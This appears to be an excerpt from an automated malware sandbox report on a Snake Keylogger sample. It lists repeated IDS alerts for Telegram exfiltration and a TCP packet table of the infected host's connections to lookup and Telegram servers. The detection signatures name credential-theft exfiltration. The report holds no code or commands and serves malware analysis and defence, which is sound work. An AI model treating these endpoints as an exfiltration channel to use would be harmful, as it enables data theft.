2024-09-27T12:53:44.350153+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49778	149.154.167.220	443	TCP
2024-09-27T12:53:45.934379+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49779	149.154.167.220	443	TCP
2024-09-27T12:53:46.986929+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49780	149.154.167.220	443	TCP
2024-09-27T12:53:47.922276+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49781	149.154.167.220	443	TCP
2024-09-27T12:53:48.784943+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49782	149.154.167.220	443	TCP
2024-09-27T12:53:49.745410+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49783	149.154.167.220	443	TCP
2024-09-27T12:53:50.673710+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49784	149.154.167.220	443	TCP
2024-09-27T12:53:51.647226+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49785	149.154.167.220	443	TCP
2024-09-27T12:53:52.584720+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49786	149.154.167.220	443	TCP
2024-09-27T12:53:54.213958+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49787	149.154.167.220	443	TCP
2024-09-27T12:53:55.164647+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49788	149.154.167.220	443	TCP
2024-09-27T12:53:56.115432+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49789	149.154.167.220	443	TCP
2024-09-27T12:53:56.995918+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49790	149.154.167.220	443	TCP
2024-09-27T12:53:58.164241+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49791	149.154.167.220	443	TCP
2024-09-27T12:53:59.549323+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49792	149.154.167.220	443	TCP
2024-09-27T12:54:00.862924+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49793	149.154.167.220	443	TCP
2024-09-27T12:54:01.749412+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49794	149.154.167.220	443	TCP
2024-09-27T12:54:03.121663+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49795	149.154.167.220	443	TCP
2024-09-27T12:54:04.822220+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49796	149.154.167.220	443	TCP
2024-09-27T12:54:05.716951+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49797	149.154.167.220	443	TCP
2024-09-27T12:54:06.618867+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49798	149.154.167.220	443	TCP
2024-09-27T12:54:07.555750+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49799	149.154.167.220	443	TCP
2024-09-27T12:54:08.560156+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49800	149.154.167.220	443	TCP
2024-09-27T12:54:10.449602+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49801	149.154.167.220	443	TCP
2024-09-27T12:54:11.411855+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49802	149.154.167.220	443	TCP
2024-09-27T12:54:12.345692+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49803	149.154.167.220	443	TCP
2024-09-27T12:54:21.537666+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49804	149.154.167.220	443	TCP
2024-09-27T12:54:22.741291+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49805	149.154.167.220	443	TCP
2024-09-27T12:54:23.891743+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49806	149.154.167.220	443	TCP
2024-09-27T12:54:24.961306+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49807	149.154.167.220	443	TCP
2024-09-27T12:54:26.020688+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49808	149.154.167.220	443	TCP
2024-09-27T12:54:27.126627+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49809	149.154.167.220	443	TCP
2024-09-27T12:54:28.271057+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49810	149.154.167.220	443	TCP
2024-09-27T12:54:29.417458+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49811	149.154.167.220	443	TCP
2024-09-27T12:54:30.527303+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49812	149.154.167.220	443	TCP
2024-09-27T12:54:31.479634+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49813	149.154.167.220	443	TCP
2024-09-27T12:54:32.428226+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49814	149.154.167.220	443	TCP
2024-09-27T12:54:33.346730+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49815	149.154.167.220	443	TCP
2024-09-27T12:54:34.462613+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49816	149.154.167.220	443	TCP
2024-09-27T12:54:35.541339+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49817	149.154.167.220	443	TCP
2024-09-27T12:54:40.052626+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49818	149.154.167.220	443	TCP
2024-09-27T12:54:54.520068+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49819	149.154.167.220	443	TCP
2024-09-27T12:55:45.695621+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49820	149.154.167.220	443	TCP
2024-09-27T12:56:03.823752+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49821	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 27, 2024 12:52:08.936880112 CEST	49702	80	192.168.2.7	193.122.130.0
Sep 27, 2024 12:52:08.941797018 CEST	80	49702	193.122.130.0	192.168.2.7
Sep 27, 2024 12:52:08.941889048 CEST	49702	80	192.168.2.7	193.122.130.0
Sep 27, 2024 12:52:08.942128897 CEST	49702	80	192.168.2.7	193.122.130.0
Sep 27, 2024 12:52:08.946916103 CEST	80	49702	193.122.130.0	192.168.2.7
Sep 27, 2024 12:52:09.404691935 CEST	80	49702	193.122.130.0	192.168.2.7
Sep 27, 2024 12:52:09.419301987 CEST	49702	80	192.168.2.7	193.122.130.0
Sep 27, 2024 12:52:09.424177885 CEST	80	49702	193.122.130.0	192.168.2.7
Sep 27, 2024 12:52:09.520695925 CEST	80	49702	193.122.130.0	192.168.2.7
Sep 27, 2024 12:52:09.595580101 CEST	49702	80	192.168.2.7	193.122.130.0
Sep 27, 2024 12:52:09.627954006 CEST	49703	443	192.168.2.7	188.114.96.3
Sep 27, 2024 12:52:09.627990007 CEST	443	49703	188.114.96.3	192.168.2.7
Sep 27, 2024 12:52:09.628180981 CEST	49703	443	192.168.2.7	188.114.96.3
Sep 27, 2024 12:52:09.677146912 CEST	49703	443	192.168.2.7	188.114.96.3
Sep 27, 2024 12:52:09.677165031 CEST	443	49703	188.114.96.3	192.168.2.7
Sep 27, 2024 12:52:10.242614031 CEST	443	49703	188.114.96.3	192.168.2.7
Sep 27, 2024 12:52:10.242801905 CEST	49703	443	192.168.2.7	188.114.96.3
Sep 27, 2024 12:52:10.272388935 CEST	49703	443	192.168.2.7	188.114.96.3
Sep 27, 2024 12:52:10.272406101 CEST	443	49703	188.114.96.3	192.168.2.7
Sep 27, 2024 12:52:10.272902012 CEST	443	49703	188.114.96.3	192.168.2.7
Sep 27, 2024 12:52:10.321901083 CEST	49703	443	192.168.2.7	188.114.96.3
Sep 27, 2024 12:52:10.376717091 CEST	49703	443	192.168.2.7	188.114.96.3
Sep 27, 2024 12:52:10.419399977 CEST	443	49703	188.114.96.3	192.168.2.7
Sep 27, 2024 12:52:10.557240963 CEST	443	49703	188.114.96.3	192.168.2.7
Sep 27, 2024 12:52:10.557351112 CEST	443	49703	188.114.96.3	192.168.2.7
Sep 27, 2024 12:52:10.557601929 CEST	49703	443	192.168.2.7	188.114.96.3
Sep 27, 2024 12:52:10.592895985 CEST	49703	443	192.168.2.7	188.114.96.3
Sep 27, 2024 12:52:10.619218111 CEST	49702	80	192.168.2.7	193.122.130.0
Sep 27, 2024 12:52:10.624034882 CEST	80	49702	193.122.130.0	192.168.2.7
Sep 27, 2024 12:52:10.720978975 CEST	80	49702	193.122.130.0	192.168.2.7
Sep 27, 2024 12:52:10.735784054 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 27, 2024 12:52:10.735831022 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 27, 2024 12:52:10.735903025 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 27, 2024 12:52:10.736382961 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 27, 2024 12:52:10.736406088 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 27, 2024 12:52:10.783099890 CEST	49702	80	192.168.2.7	193.122.130.0
Sep 27, 2024 12:52:11.211633921 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 27, 2024 12:52:11.258156061 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 27, 2024 12:52:11.258240938 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 27, 2024 12:52:11.370985985 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 27, 2024 12:52:11.371072054 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 27, 2024 12:52:11.371144056 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 27, 2024 12:52:11.377677917 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 27, 2024 12:52:11.798914909 CEST	49702	80	192.168.2.7	193.122.130.0
Sep 27, 2024 12:52:11.808048964 CEST	80	49702	193.122.130.0	192.168.2.7
Sep 27, 2024 12:52:11.808128119 CEST	49702	80	192.168.2.7	193.122.130.0
Sep 27, 2024 12:52:11.816786051 CEST	49705	80	192.168.2.7	193.122.130.0
Sep 27, 2024 12:52:11.824476957 CEST	80	49705	193.122.130.0	192.168.2.7
Sep 27, 2024 12:52:11.824578047 CEST	49705	80	192.168.2.7	193.122.130.0
Sep 27, 2024 12:52:11.827440023 CEST	49705	80	192.168.2.7	193.122.130.0
Sep 27, 2024 12:52:11.833201885 CEST	80	49705	193.122.130.0	192.168.2.7
Sep 27, 2024 12:52:12.413592100 CEST	80	49705	193.122.130.0	192.168.2.7
Sep 27, 2024 12:52:12.414819002 CEST	49707	443	192.168.2.7	188.114.96.3
Sep 27, 2024 12:52:12.414900064 CEST	443	49707	188.114.96.3	192.168.2.7
Sep 27, 2024 12:52:12.414967060 CEST	49707	443	192.168.2.7	188.114.96.3
Sep 27, 2024 12:52:12.415271997 CEST	49707	443	192.168.2.7	188.114.96.3
Sep 27, 2024 12:52:12.415282011 CEST	443	49707	188.114.96.3	192.168.2.7
Sep 27, 2024 12:52:12.475313902 CEST	49705	80	192.168.2.7	193.122.130.0
Sep 27, 2024 12:52:13.009721041 CEST	443	49707	188.114.96.3	192.168.2.7
Sep 27, 2024 12:52:13.011662960 CEST	49707	443	192.168.2.7	188.114.96.3
Sep 27, 2024 12:52:13.011703968 CEST	443	49707	188.114.96.3	192.168.2.7
Sep 27, 2024 12:52:13.156523943 CEST	443	49707	188.114.96.3	192.168.2.7
Sep 27, 2024 12:52:13.156646967 CEST	443	49707	188.114.96.3	192.168.2.7
Sep 27, 2024 12:52:13.156706095 CEST	49707	443	192.168.2.7	188.114.96.3
Sep 27, 2024 12:52:13.157111883 CEST	49707	443	192.168.2.7	188.114.96.3
Sep 27, 2024 12:52:13.161153078 CEST	49705	80	192.168.2.7	193.122.130.0
Sep 27, 2024 12:52:13.162364006 CEST	49708	80	192.168.2.7	193.122.130.0
Sep 27, 2024 12:52:13.177078962 CEST	80	49708	193.122.130.0	192.168.2.7
Sep 27, 2024 12:52:13.177099943 CEST	80	49705	193.122.130.0	192.168.2.7
Sep 27, 2024 12:52:13.177211046 CEST	49705	80	192.168.2.7	193.122.130.0
Sep 27, 2024 12:52:13.177236080 CEST	49708	80	192.168.2.7	193.122.130.0
Sep 27, 2024 12:52:13.177370071 CEST	49708	80	192.168.2.7	193.122.130.0
Sep 27, 2024 12:52:13.447932959 CEST	80	49705	193.122.130.0	192.168.2.7
Sep 27, 2024 12:52:13.448050022 CEST	49705	80	192.168.2.7	193.122.130.0
Sep 27, 2024 12:52:13.448554993 CEST	80	49708	193.122.130.0	192.168.2.7
Sep 27, 2024 12:52:13.455791950 CEST	80	49705	193.122.130.0	192.168.2.7
Sep 27, 2024 12:52:14.021292925 CEST	80	49708	193.122.130.0	192.168.2.7
Sep 27, 2024 12:52:14.030663967 CEST	49710	443	192.168.2.7	188.114.96.3
Sep 27, 2024 12:52:14.030706882 CEST	443	49710	188.114.96.3	192.168.2.7
Sep 27, 2024 12:52:14.031078100 CEST	49710	443	192.168.2.7	188.114.96.3
Sep 27, 2024 12:52:14.031363010 CEST	49710	443	192.168.2.7	188.114.96.3
Sep 27, 2024 12:52:14.031378984 CEST	443	49710	188.114.96.3	192.168.2.7
Sep 27, 2024 12:52:14.064399958 CEST	49708	80	192.168.2.7	193.122.130.0
Sep 27, 2024 12:52:14.567394972 CEST	443	49710	188.114.96.3	192.168.2.7
Sep 27, 2024 12:52:14.611211061 CEST	49710	443	192.168.2.7	188.114.96.3
Sep 27, 2024 12:52:14.625211954 CEST	49710	443	192.168.2.7	188.114.96.3
Sep 27, 2024 12:52:14.625241041 CEST	443	49710	188.114.96.3	192.168.2.7
Sep 27, 2024 12:52:14.738665104 CEST	443	49710	188.114.96.3	192.168.2.7
Sep 27, 2024 12:52:14.738754034 CEST	443	49710	188.114.96.3	192.168.2.7
Sep 27, 2024 12:52:14.738878012 CEST	49710	443	192.168.2.7	188.114.96.3
Sep 27, 2024 12:52:14.772476912 CEST	49710	443	192.168.2.7	188.114.96.3
Sep 27, 2024 12:52:14.793137074 CEST	49711	80	192.168.2.7	193.122.130.0
Sep 27, 2024 12:52:14.803915024 CEST	80	49711	193.122.130.0	192.168.2.7
Sep 27, 2024 12:52:14.804050922 CEST	49711	80	192.168.2.7	193.122.130.0
Sep 27, 2024 12:52:14.804182053 CEST	49711	80	192.168.2.7	193.122.130.0
Sep 27, 2024 12:52:14.815115929 CEST	80	49711	193.122.130.0	192.168.2.7
Sep 27, 2024 12:52:15.339409113 CEST	80	49711	193.122.130.0	192.168.2.7
Sep 27, 2024 12:52:15.348752022 CEST	49712	443	192.168.2.7	188.114.96.3
Sep 27, 2024 12:52:15.348802090 CEST	443	49712	188.114.96.3	192.168.2.7
Sep 27, 2024 12:52:15.348872900 CEST	49712	443	192.168.2.7	188.114.96.3
Sep 27, 2024 12:52:15.365556002 CEST	49712	443	192.168.2.7	188.114.96.3
Sep 27, 2024 12:52:15.365582943 CEST	443	49712	188.114.96.3	192.168.2.7
Sep 27, 2024 12:52:15.392456055 CEST	49711	80	192.168.2.7	193.122.130.0
Sep 27, 2024 12:52:15.933759928 CEST	443	49712	188.114.96.3	192.168.2.7
Sep 27, 2024 12:52:15.936760902 CEST	49712	443	192.168.2.7	188.114.96.3
Sep 27, 2024 12:52:15.936789036 CEST	443	49712	188.114.96.3	192.168.2.7
Sep 27, 2024 12:52:16.138668060 CEST	443	49712	188.114.96.3	192.168.2.7
Sep 27, 2024 12:52:16.138762951 CEST	443	49712	188.114.96.3	192.168.2.7
Sep 27, 2024 12:52:16.138820887 CEST	49712	443	192.168.2.7	188.114.96.3
Sep 27, 2024 12:52:16.140695095 CEST	49712	443	192.168.2.7	188.114.96.3
Sep 27, 2024 12:52:16.171802044 CEST	49711	80	192.168.2.7	193.122.130.0
Sep 27, 2024 12:52:16.176054955 CEST	49713	80	192.168.2.7	193.122.130.0
Sep 27, 2024 12:52:16.177505970 CEST	80	49711	193.122.130.0	192.168.2.7
Sep 27, 2024 12:52:16.177582026 CEST	49711	80	192.168.2.7	193.122.130.0
Sep 27, 2024 12:52:16.180902004 CEST	80	49713	193.122.130.0	192.168.2.7
Sep 27, 2024 12:52:16.180984020 CEST	49713	80	192.168.2.7	193.122.130.0
Sep 27, 2024 12:52:16.181303978 CEST	49713	80	192.168.2.7	193.122.130.0
Sep 27, 2024 12:52:16.186171055 CEST	80	49713	193.122.130.0	192.168.2.7
Sep 27, 2024 12:52:16.761796951 CEST	80	49713	193.122.130.0	192.168.2.7
Sep 27, 2024 12:52:16.763727903 CEST	49714	443	192.168.2.7	188.114.96.3
Sep 27, 2024 12:52:16.763763905 CEST	443	49714	188.114.96.3	192.168.2.7
Sep 27, 2024 12:52:16.763977051 CEST	49714	443	192.168.2.7	188.114.96.3
Sep 27, 2024 12:52:16.764410973 CEST	49714	443	192.168.2.7	188.114.96.3
Sep 27, 2024 12:52:16.764425039 CEST	443	49714	188.114.96.3	192.168.2.7
Sep 27, 2024 12:52:16.814333916 CEST	49713	80	192.168.2.7	193.122.130.0
Sep 27, 2024 12:52:17.314228058 CEST	443	49714	188.114.96.3	192.168.2.7
Sep 27, 2024 12:52:17.316977024 CEST	49714	443	192.168.2.7	188.114.96.3
Sep 27, 2024 12:52:17.316999912 CEST	443	49714	188.114.96.3	192.168.2.7
Sep 27, 2024 12:52:17.525410891 CEST	443	49714	188.114.96.3	192.168.2.7
Sep 27, 2024 12:52:17.525527954 CEST	443	49714	188.114.96.3	192.168.2.7
Sep 27, 2024 12:52:17.525621891 CEST	49714	443	192.168.2.7	188.114.96.3
Sep 27, 2024 12:52:17.534326077 CEST	49714	443	192.168.2.7	188.114.96.3
Sep 27, 2024 12:52:17.546086073 CEST	49713	80	192.168.2.7	193.122.130.0
Sep 27, 2024 12:52:17.550452948 CEST	49715	80	192.168.2.7	193.122.130.0
Sep 27, 2024 12:52:17.555723906 CEST	80	49715	193.122.130.0	192.168.2.7
Sep 27, 2024 12:52:17.555802107 CEST	49715	80	192.168.2.7	193.122.130.0
Sep 27, 2024 12:52:17.556176901 CEST	80	49713	193.122.130.0	192.168.2.7
Sep 27, 2024 12:52:17.556344032 CEST	49713	80	192.168.2.7	193.122.130.0
Sep 27, 2024 12:52:17.570626020 CEST	49715	80	192.168.2.7	193.122.130.0
Sep 27, 2024 12:52:17.575524092 CEST	80	49715	193.122.130.0	192.168.2.7
Sep 27, 2024 12:52:18.063410044 CEST	80	49715	193.122.130.0	192.168.2.7
Sep 27, 2024 12:52:18.091459036 CEST	49716	443	192.168.2.7	188.114.96.3
Sep 27, 2024 12:52:18.091516018 CEST	443	49716	188.114.96.3	192.168.2.7
Sep 27, 2024 12:52:18.091608047 CEST	49716	443	192.168.2.7	188.114.96.3
Sep 27, 2024 12:52:18.095674038 CEST	49716	443	192.168.2.7	188.114.96.3
Sep 27, 2024 12:52:18.095705986 CEST	443	49716	188.114.96.3	192.168.2.7
Sep 27, 2024 12:52:18.111337900 CEST	49715	80	192.168.2.7	193.122.130.0
Sep 27, 2024 12:52:18.553735971 CEST	443	49716	188.114.96.3	192.168.2.7
Sep 27, 2024 12:52:18.596792936 CEST	49716	443	192.168.2.7	188.114.96.3
Sep 27, 2024 12:52:18.619055986 CEST	49716	443	192.168.2.7	188.114.96.3
Sep 27, 2024 12:52:18.619081974 CEST	443	49716	188.114.96.3	192.168.2.7
Sep 27, 2024 12:52:18.729687929 CEST	443	49716	188.114.96.3	192.168.2.7
Sep 27, 2024 12:52:18.730531931 CEST	443	49716	188.114.96.3	192.168.2.7
Sep 27, 2024 12:52:18.733062029 CEST	49716	443	192.168.2.7	188.114.96.3
Sep 27, 2024 12:52:18.767822027 CEST	49716	443	192.168.2.7	188.114.96.3
Sep 27, 2024 12:52:18.862401009 CEST	49715	80	192.168.2.7	193.122.130.0
Sep 27, 2024 12:52:18.863651037 CEST	49717	80	192.168.2.7	193.122.130.0
Sep 27, 2024 12:52:18.867965937 CEST	80	49715	193.122.130.0	192.168.2.7
Sep 27, 2024 12:52:18.868583918 CEST	80	49717	193.122.130.0	192.168.2.7
Sep 27, 2024 12:52:18.868654013 CEST	49715	80	192.168.2.7	193.122.130.0
Sep 27, 2024 12:52:18.868686914 CEST	49717	80	192.168.2.7	193.122.130.0
Sep 27, 2024 12:52:18.884442091 CEST	49717	80	192.168.2.7	193.122.130.0
Sep 27, 2024 12:52:18.889940023 CEST	80	49717	193.122.130.0	192.168.2.7
Sep 27, 2024 12:52:19.780775070 CEST	80	49717	193.122.130.0	192.168.2.7
Sep 27, 2024 12:52:19.782275915 CEST	49718	443	192.168.2.7	188.114.96.3
Sep 27, 2024 12:52:19.782310963 CEST	443	49718	188.114.96.3	192.168.2.7
Sep 27, 2024 12:52:19.782403946 CEST	49718	443	192.168.2.7	188.114.96.3
Sep 27, 2024 12:52:19.782702923 CEST	49718	443	192.168.2.7	188.114.96.3
Sep 27, 2024 12:52:19.782718897 CEST	443	49718	188.114.96.3	192.168.2.7
Sep 27, 2024 12:52:19.830033064 CEST	49717	80	192.168.2.7	193.122.130.0
Sep 27, 2024 12:52:20.279212952 CEST	443	49718	188.114.96.3	192.168.2.7
Sep 27, 2024 12:52:20.285660982 CEST	49718	443	192.168.2.7	188.114.96.3
Sep 27, 2024 12:52:20.285686016 CEST	443	49718	188.114.96.3	192.168.2.7
Sep 27, 2024 12:52:20.418543100 CEST	443	49718	188.114.96.3	192.168.2.7
Sep 27, 2024 12:52:20.418648958 CEST	443	49718	188.114.96.3	192.168.2.7
Sep 27, 2024 12:52:20.418724060 CEST	49718	443	192.168.2.7	188.114.96.3
Sep 27, 2024 12:52:20.419260025 CEST	49718	443	192.168.2.7	188.114.96.3
Sep 27, 2024 12:52:26.119405985 CEST	49717	80	192.168.2.7	193.122.130.0
Sep 27, 2024 12:52:26.153475046 CEST	80	49717	193.122.130.0	192.168.2.7
Sep 27, 2024 12:52:26.153583050 CEST	49717	80	192.168.2.7	193.122.130.0
Sep 27, 2024 12:52:26.203977108 CEST	49724	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:26.204014063 CEST	443	49724	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:26.204081059 CEST	49724	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:26.205255985 CEST	49724	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:26.205265045 CEST	443	49724	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:26.895482063 CEST	443	49724	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:26.895574093 CEST	49724	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:26.899470091 CEST	49724	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:26.899480104 CEST	443	49724	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:26.899796963 CEST	443	49724	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:26.910599947 CEST	49724	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:26.951392889 CEST	443	49724	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:26.951458931 CEST	49724	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:26.951463938 CEST	443	49724	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:27.432562113 CEST	443	49724	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:27.432900906 CEST	443	49724	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:27.432960033 CEST	49724	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:27.433437109 CEST	49724	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:36.680819988 CEST	49725	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:36.680856943 CEST	443	49725	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:36.680932045 CEST	49725	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:36.681473970 CEST	49725	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:36.681492090 CEST	443	49725	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:37.297960043 CEST	443	49725	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:37.299923897 CEST	49725	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:37.299957991 CEST	443	49725	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:37.300035954 CEST	49725	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:37.300045967 CEST	443	49725	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:37.592187881 CEST	443	49725	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:37.592269897 CEST	443	49725	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:37.592324018 CEST	49725	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:37.592926979 CEST	49725	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:37.600874901 CEST	49726	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:37.600898981 CEST	443	49726	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:37.600967884 CEST	49726	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:37.601495028 CEST	49726	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:37.601509094 CEST	443	49726	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:38.216306925 CEST	443	49726	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:38.219672918 CEST	49726	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:38.219695091 CEST	443	49726	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:38.219752073 CEST	49726	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:38.219763041 CEST	443	49726	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:38.549288988 CEST	443	49726	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:38.549472094 CEST	443	49726	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:38.549542904 CEST	49726	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:38.554263115 CEST	49726	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:38.557749987 CEST	49727	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:38.557787895 CEST	443	49727	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:38.557856083 CEST	49727	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:38.558065891 CEST	49727	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:38.558079958 CEST	443	49727	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:39.193954945 CEST	443	49727	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:39.195487976 CEST	49727	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:39.195502043 CEST	443	49727	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:39.195559978 CEST	49727	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:39.195566893 CEST	443	49727	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:39.491728067 CEST	443	49727	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:39.491961002 CEST	443	49727	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:39.492046118 CEST	49727	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:39.492368937 CEST	49727	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:39.494882107 CEST	49728	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:39.494929075 CEST	443	49728	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:39.495022058 CEST	49728	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:39.495256901 CEST	49728	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:39.495269060 CEST	443	49728	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:40.104377031 CEST	443	49728	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:40.106113911 CEST	49728	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:40.106132030 CEST	443	49728	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:40.106203079 CEST	49728	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:40.106208086 CEST	443	49728	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:40.422177076 CEST	443	49728	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:40.422478914 CEST	443	49728	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:40.422538996 CEST	49728	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:40.422847033 CEST	49728	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:40.425164938 CEST	49729	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:40.425240993 CEST	443	49729	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:40.425343990 CEST	49729	443	192.168.2.7	149.154.167.220
